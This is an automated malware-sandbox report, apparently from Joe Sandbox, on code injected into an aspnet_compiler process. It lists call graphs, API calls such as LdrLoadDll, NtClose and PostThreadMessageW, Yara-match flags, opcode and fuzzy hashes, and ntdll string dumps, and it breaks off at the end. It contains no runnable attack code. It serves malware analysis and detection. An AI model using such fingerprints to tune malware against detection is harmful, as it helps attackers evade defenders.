                                                                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                                                                        Signature Coverage:9.6%
                                                                                                        Total number of Nodes:136
                                                                                                        Total number of Limit Nodes:11
                                                                                                        execution_graph 81990 424be3 81991 424bfc 81990->81991 81992 424c88 81991->81992 81993 424c47 81991->81993 81996 424c83 81991->81996 81998 42e593 81993->81998 81997 42e593 RtlFreeHeap 81996->81997 81997->81992 82001 42c813 81998->82001 82000 424c53 82002 42c830 82001->82002 82003 42c841 RtlFreeHeap 82002->82003 82003->82000 82004 42f883 82005 42f7f3 82004->82005 82006 42f850 82005->82006 82010 42e673 82005->82010 82008 42f82d 82009 42e593 RtlFreeHeap 82008->82009 82009->82006 82013 42c7c3 82010->82013 82012 42e68e 82012->82008 82014 42c7e0 82013->82014 82015 42c7f1 RtlAllocateHeap 82014->82015 82015->82012 82016 42ba83 82017 42baa0 82016->82017 82020 1152df0 LdrInitializeThunk 82017->82020 82018 42bac8 82020->82018 82126 42f753 82127 42f763 82126->82127 82128 42f769 82126->82128 82129 42e673 RtlAllocateHeap 82128->82129 82130 42f78f 82129->82130 82131 424853 82132 42486f 82131->82132 82133 424897 82132->82133 82134 4248ab 82132->82134 82135 42c4a3 NtClose 82133->82135 82136 42c4a3 NtClose 82134->82136 82137 4248a0 82135->82137 82138 4248b4 82136->82138 82141 42e6b3 RtlAllocateHeap 82138->82141 82140 4248bf 82141->82140 82142 4298f3 82144 429957 82142->82144 82143 42998a 82144->82143 82147 4138d3 82144->82147 82146 42996c 82148 4138e2 82147->82148 82149 4138ad 82147->82149 82152 42c733 82149->82152 82153 42c74d 82152->82153 82156 1152c70 LdrInitializeThunk 82153->82156 82154 4138b5 82154->82146 82156->82154 82021 41b143 82022 41b187 82021->82022 82024 41b1a8 82022->82024 82025 42c4a3 82022->82025 82026 42c4c0 82025->82026 82027 42c4d1 NtClose 82026->82027 82027->82024 82028 413e03 82029 413e09 82028->82029 82034 4175d3 82029->82034 82031 413e3b 82032 413e80 82031->82032 82033 413e6f PostThreadMessageW 82031->82033 82033->82032 82036 4175f7 82034->82036 82035 4175fe 82035->82031 82036->82035 82038 41761d 82036->82038 82041 42fb33 LdrLoadDll 82036->82041 82039 417633 LdrLoadDll 82038->82039 82040 41764a 82038->82040 82039->82040 82040->82031 82041->82038 82157 1152b60 LdrInitializeThunk 82158 418b98 82159 418ba2 82158->82159 82160 42c4a3 NtClose 82158->82160 82160->82159 82042 401a0b 82044 4019eb 82042->82044 82043 401a00 82044->82043 82047 42fc23 82044->82047 82050 42e143 82047->82050 82051 42e169 82050->82051 82062 407413 82051->82062 82053 42e17f 82061 401aa8 82053->82061 82065 41af53 82053->82065 82055 42e19e 82058 42e1b3 82055->82058 82080 42c863 82055->82080 82076 428153 82058->82076 82059 42e1cd 82060 42c863 ExitProcess 82059->82060 82060->82061 82064 407420 82062->82064 82083 416293 82062->82083 82064->82053 82066 41af7f 82065->82066 82101 41ae43 82066->82101 82069 41afc4 82071 41afe0 82069->82071 82074 42c4a3 NtClose 82069->82074 82070 41afac 82072 41afb7 82070->82072 82073 42c4a3 NtClose 82070->82073 82071->82055 82072->82055 82073->82072 82075 41afd6 82074->82075 82075->82055 82078 4281b5 82076->82078 82077 4281c2 82077->82059 82078->82077 82112 418443 82078->82112 82081 42c880 82080->82081 82082 42c891 ExitProcess 82081->82082 82082->82058 82084 4162b0 82083->82084 82086 4162c9 82084->82086 82087 42cf13 82084->82087 82086->82064 82089 42cf2d 82087->82089 82088 42cf5c 82088->82086 82089->82088 82094 42bad3 82089->82094 82092 42e593 RtlFreeHeap 82093 42cfd5 82092->82093 82093->82086 82095 42baed 82094->82095 82098 1152c0a 82095->82098 82096 42bb19 82096->82092 82099 1152c11 82098->82099 82100 1152c1f LdrInitializeThunk 82098->82100 82099->82096 82100->82096 82102 41ae5d 82101->82102 82106 41af39 82101->82106 82107 42bb73 82102->82107 82105 42c4a3 NtClose 82105->82106 82106->82069 82106->82070 82108 42bb90 82107->82108 82111 11535c0 LdrInitializeThunk 82108->82111 82109 41af2d 82109->82105 82111->82109 82114 418444 82112->82114 82113 41897b 82113->82077 82114->82113 82120 413a73 82114->82120 82116 41859a 82116->82113 82117 42e593 RtlFreeHeap 82116->82117 82118 4185b2 82117->82118 82118->82113 82119 42c863 ExitProcess 82118->82119 82119->82113 82124 413a93 82120->82124 82122 413afc 82122->82116 82123 413af2 82123->82116 82124->82122 82125 41b263 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82124->82125 82125->82123

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 80 4175d3-4175fc call 42f293 83 417602-417610 call 42f893 80->83 84 4175fe-417601 80->84 87 417620-417631 call 42dc13 83->87 88 417612-41761d call 42fb33 83->88 93 417633-417647 LdrLoadDll 87->93 94 41764a-41764d 87->94 88->87 93->94
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417645
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 1d0f88e0e6ba56f344ef909ba5b018900d3faf01ae7809843121af1e57491e36
                                                                                                        • Instruction ID: 5d30bfda31744eed2288eea38138e939bbde262c23c4e3c022ec3d374f5692c1
                                                                                                        • Opcode Fuzzy Hash: 1d0f88e0e6ba56f344ef909ba5b018900d3faf01ae7809843121af1e57491e36
                                                                                                        • Instruction Fuzzy Hash: C20171B5E4020DBBDF10DBE5DC42FDEB3789B54308F4041AAE90897240F635EB488B95

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 100 42c4a3-42c4df call 404773 call 42d703 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4DA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                                                                        • Instruction ID: 33488c65c50e967ce8032212b01be2a4ccc8566337b661b198c809349525c89b
                                                                                                        • Opcode Fuzzy Hash: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                                                                        • Instruction Fuzzy Hash: 98E046762002187BD220AA6AEC41F9B776CDFC6724F44441AFA08A7281CBB4BA0186B5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 28d3ee007b3dc78f8da78f8421c904dbc3b9e89cdaac4ae98e2d6c8542492bdb
                                                                                                        • Instruction ID: 0ea91a6d57d86fa95667d3bf1f04059187b436ef6871522357c81edc32e0da84
                                                                                                        • Opcode Fuzzy Hash: 28d3ee007b3dc78f8da78f8421c904dbc3b9e89cdaac4ae98e2d6c8542492bdb
                                                                                                        • Instruction Fuzzy Hash: 3D90027160560402D1047158461470A100997D0201F65C411A4425568DC7968A6166A2

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 114 1152b60-1152b6c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: bc70912eddb58c8ec84e8832b1057632a99781501895dcd1638683b48423bff5
                                                                                                        • Instruction ID: 5b6eaa4235d127a0a004f47779db97b8bc6393253d11205d267b302e4d095d97
                                                                                                        • Opcode Fuzzy Hash: bc70912eddb58c8ec84e8832b1057632a99781501895dcd1638683b48423bff5
                                                                                                        • Instruction Fuzzy Hash: 179002A12025000341097158451461A400E97E0201B55C021E5015590DC62689A16225

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 116 1152df0-1152dfc LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: fcf7fdaa2ef7cd45eb9f741595c69ce5b49850ff75971f28490d6d02361d887f
                                                                                                        • Instruction ID: 945bb15a9e74c9176f322739e3747e474a684fee1a2fe0f937942d665f812b3b
                                                                                                        • Opcode Fuzzy Hash: fcf7fdaa2ef7cd45eb9f741595c69ce5b49850ff75971f28490d6d02361d887f
                                                                                                        • Instruction Fuzzy Hash: 2D90027120150413D1157158460470B000D97D0241F95C412A4425558DD7578A62A221

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 115 1152c70-1152c7c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ac120ae0c5d8c836ca76579bdafcad31fb2f74cc5a9eca7aab3815da021f9923
                                                                                                        • Instruction ID: f3bcd175eb350b559f734e37e3c7565396fb1128024c07278c9b7f29d6374982
                                                                                                        • Opcode Fuzzy Hash: ac120ae0c5d8c836ca76579bdafcad31fb2f74cc5a9eca7aab3815da021f9923
                                                                                                        • Instruction Fuzzy Hash: 5990027120158802D1147158850474E000997D0301F59C411A8425658DC79689A17221

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(441b1bVp,00000111,00000000,00000000), ref: 00413E7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 441b1bVp$441b1bVp
                                                                                                        • API String ID: 1836367815-3612730822
                                                                                                        • Opcode ID: f09383ebc41775cc4370c9f5a18e29e8c0766a2917f730da50301ea12b2afcf7
                                                                                                        • Instruction ID: e9f97e6674303ac1ec114bd664971e7a3b0d8b676d214be5648336279c9080a9
                                                                                                        • Opcode Fuzzy Hash: f09383ebc41775cc4370c9f5a18e29e8c0766a2917f730da50301ea12b2afcf7
                                                                                                        • Instruction Fuzzy Hash: FA113372D4021CBADB019B959C82DEFBBBCDF81358B44815AF908A7241D6780F028BA5

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(441b1bVp,00000111,00000000,00000000), ref: 00413E7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 441b1bVp$441b1bVp
                                                                                                        • API String ID: 1836367815-3612730822
                                                                                                        • Opcode ID: 60d3ff1ff0adfd05e5505e9bebb73d2d6f620e1efecc5e751c4564b3911bc92e
                                                                                                        • Instruction ID: f2c417189eb1d549494036746a4d18628e3c33249227c5641da929ecd34be5d7
                                                                                                        • Opcode Fuzzy Hash: 60d3ff1ff0adfd05e5505e9bebb73d2d6f620e1efecc5e751c4564b3911bc92e
                                                                                                        • Instruction Fuzzy Hash: 8F1102B2D4021C7ADB10AAA68C82DEFBBBCDF41758F448069FA04B7241D6784F0687A5

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(441b1bVp,00000111,00000000,00000000), ref: 00413E7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 441b1bVp$441b1bVp
                                                                                                        • API String ID: 1836367815-3612730822
                                                                                                        • Opcode ID: 7484a9025bd5bf07a64e463fb49d81e1ff95b06ff009481a131c5e110f29d2f9
                                                                                                        • Instruction ID: 8df9d20d350e076ca3ccaabcd5318c10ff1b07ef0537a0dec719c48f66f69e81
                                                                                                        • Opcode Fuzzy Hash: 7484a9025bd5bf07a64e463fb49d81e1ff95b06ff009481a131c5e110f29d2f9
                                                                                                        • Instruction Fuzzy Hash: 0001E172D4021C7ADB00AAA29C82DEFBB7CDF41798F408069FA0477241D67C4F0687A5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 47 42c813-42c857 call 404773 call 42d703 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C852
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: 'cA
                                                                                                        • API String ID: 3298025750-2370355221
                                                                                                        • Opcode ID: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                                                                        • Instruction ID: 17d5cb76b4341d50fd7aa1bda6014d5d3e310c77e1840313bf8453552cdf047a
                                                                                                        • Opcode Fuzzy Hash: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                                                                        • Instruction Fuzzy Hash: D8E06D712042087BD610EE59DC41F9B33ACEFC9710F404419F908A7241C774B91186B9

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 68 417653-417672 69 417675-417688 68->69 70 417697-4176b2 68->70 71 417693-417695 69->71 72 41768a-417691 69->72 73 4176b4-4176b6 70->73 74 417708-417711 70->74 75 417630-417647 LdrLoadDll 71->75 76 417696 71->76 72->71 77 4176b7-4176bf 73->77 79 41764a-41764d 75->79 76->70 77->77 78 4176c1-4176f8 77->78 78->74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 829426a3ec210af60e2c02bbd8d1fa420cdddcd0ddd37ade37f5b2cc5b7cef9b
                                                                                                        • Instruction ID: 13cd60f185a4a9e5f592b31b74b5d2527343d5b8502568d57bb4188afc094929
                                                                                                        • Opcode Fuzzy Hash: 829426a3ec210af60e2c02bbd8d1fa420cdddcd0ddd37ade37f5b2cc5b7cef9b
                                                                                                        • Instruction Fuzzy Hash: C521883250C3CA9BC716CF7C888A5CABFF5AE5322070882EDD4D59B193C316684BC785

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 95 42c7c3-42c807 call 404773 call 42d703 RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E40E,?,?,00000000,?,0041E40E,?,?,?), ref: 0042C802
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                                                                        • Instruction ID: d9b28d67632644e52be635d512cdd863fcd8cc5184f4de7700c5ec6c30784a09
                                                                                                        • Opcode Fuzzy Hash: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                                                                        • Instruction Fuzzy Hash: F4E09275354208BBD610EE59DC41FAB37ACEFC5714F00001AF908A7241D770B91087B9

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 105 42c863-42c89f call 404773 call 42d703 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,5D0EEAC1,?,?,5D0EEAC1), ref: 0042C89A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: a4d4bde1c41013d22935837f348492cefa208b3edefa264fb9d256cbbf11bae2
                                                                                                        • Instruction ID: f3636df3db5ba9ab49c58778ad6cc278f2ad92603f3ac2d072733826d1314c23
                                                                                                        • Opcode Fuzzy Hash: a4d4bde1c41013d22935837f348492cefa208b3edefa264fb9d256cbbf11bae2
                                                                                                        • Instruction Fuzzy Hash: 17E08C7A200214BBD220FA6AEC42FDBB76DDFC5715F40405AFA08A7281C774BA0087F9

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 110 1152c0a-1152c0f 111 1152c11-1152c18 110->111 112 1152c1f-1152c26 LdrInitializeThunk 110->112
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 862d2e00b54952e649897569a7ab2fad74c36f8df576f96cc91bc6f63b0648b9
                                                                                                        • Instruction ID: 775a4f7fb2e93a96f8d9df3b689a9b457a25d286df91556b084168dbfbe86990
                                                                                                        • Opcode Fuzzy Hash: 862d2e00b54952e649897569a7ab2fad74c36f8df576f96cc91bc6f63b0648b9
                                                                                                        • Instruction Fuzzy Hash: 67B09B729015C5C5DB55E764470871B790477D0701F25C061D6130641F4739C1D1E275
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2160512332
                                                                                                        • Opcode ID: 72b268f614786a935b6d002a25b42da61fe7000b300d23817009e10c82f272e6
                                                                                                        • Instruction ID: 4409f6d4ce749cc8de424cd17c4a0156074efd1098514c073c115887008f6ac5
                                                                                                        • Opcode Fuzzy Hash: 72b268f614786a935b6d002a25b42da61fe7000b300d23817009e10c82f272e6
                                                                                                        • Instruction Fuzzy Hash: C4929E71604342AFEB29CF29C880F6BB7E8BB84754F04492DFAA5D7251D774E844CB92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                        • API String ID: 0-3591852110
                                                                                                        • Opcode ID: 54001ffa1f2e0778809c2a18cb766b4063b8ec27cd93fa96a5018fa0beb64845
                                                                                                        • Instruction ID: b928f2ff5f3135d7c293f6e78c91ec6fe28655976db6dafdce3a4738c165ff40
                                                                                                        • Opcode Fuzzy Hash: 54001ffa1f2e0778809c2a18cb766b4063b8ec27cd93fa96a5018fa0beb64845
                                                                                                        • Instruction Fuzzy Hash: E612DF34644642EFD72E8F29C445BB6BBF1FF29B14F09845DE4868B682D374E881CB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                        • API String ID: 0-3532704233
                                                                                                        • Opcode ID: 04258d9c3de23b44169c77dbb71327f6e42700c8d4042d03dbf27a2b39eba6f4
                                                                                                        • Instruction ID: c7240b702bfdc1e5259177c658a0a03428ecb6c5607d48ab6439cf346832b203
                                                                                                        • Opcode Fuzzy Hash: 04258d9c3de23b44169c77dbb71327f6e42700c8d4042d03dbf27a2b39eba6f4
                                                                                                        • Instruction Fuzzy Hash: DAB1B3719083559FCB1ADFA8D840A6FBBE8BF84754F01492EF985D7280D771D904CB92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                        • API String ID: 0-3063724069
                                                                                                        • Opcode ID: 4ee227b271413da78d4d2da4809d5cf64e37ea07b1d48daee36ff70e35acc82f
                                                                                                        • Instruction ID: aa2ba6393174a0d1169a77edb5d46757d355b811332c73d008b7b410ac1795c2
                                                                                                        • Opcode Fuzzy Hash: 4ee227b271413da78d4d2da4809d5cf64e37ea07b1d48daee36ff70e35acc82f
                                                                                                        • Instruction Fuzzy Hash: 66D108B280431AAFD729DA58C841BABBFE8AFD471CF80492DFA9497141D374C984C7D2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                        • API String ID: 0-1700792311
                                                                                                        • Opcode ID: 796a668570e38f62653964e16299a2e527045c1ac40c04d3581a58778aa09739
                                                                                                        • Instruction ID: cf62e1b778cddff9748c2c0927e7f16a5faf5ba0bf7da80ed9a18751cc923ab5
                                                                                                        • Opcode Fuzzy Hash: 796a668570e38f62653964e16299a2e527045c1ac40c04d3581a58778aa09739
                                                                                                        • Instruction Fuzzy Hash: 65D1ED39904682DFDB2ADF68C444AAEFBF1FF6AB04F08805DF5859B252C7749981CB14
                                                                                                        Strings
                                                                                                        • @, xrefs: 0110D2AF
                                                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0110D0CF
                                                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0110D146
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0110D2C3
                                                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 0110D196
                                                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0110D262
                                                                                                        • @, xrefs: 0110D0FD
                                                                                                        • @, xrefs: 0110D313
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                        • API String ID: 0-1356375266
                                                                                                        • Opcode ID: 09bc0aa1bbd7d31b2ac263d0c0a94cb137bfea24a7a9326c444defbdfb1018f8
                                                                                                        • Instruction ID: 329824020ec5c4ccd0af1313ea5ea9f5225cf87c245ba622fa4d6174c428d40a
                                                                                                        • Opcode Fuzzy Hash: 09bc0aa1bbd7d31b2ac263d0c0a94cb137bfea24a7a9326c444defbdfb1018f8
                                                                                                        • Instruction Fuzzy Hash: EAA16C71908306DFD726CFA5D480B5BBBE8BF84719F00492EF99897280D774D908CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
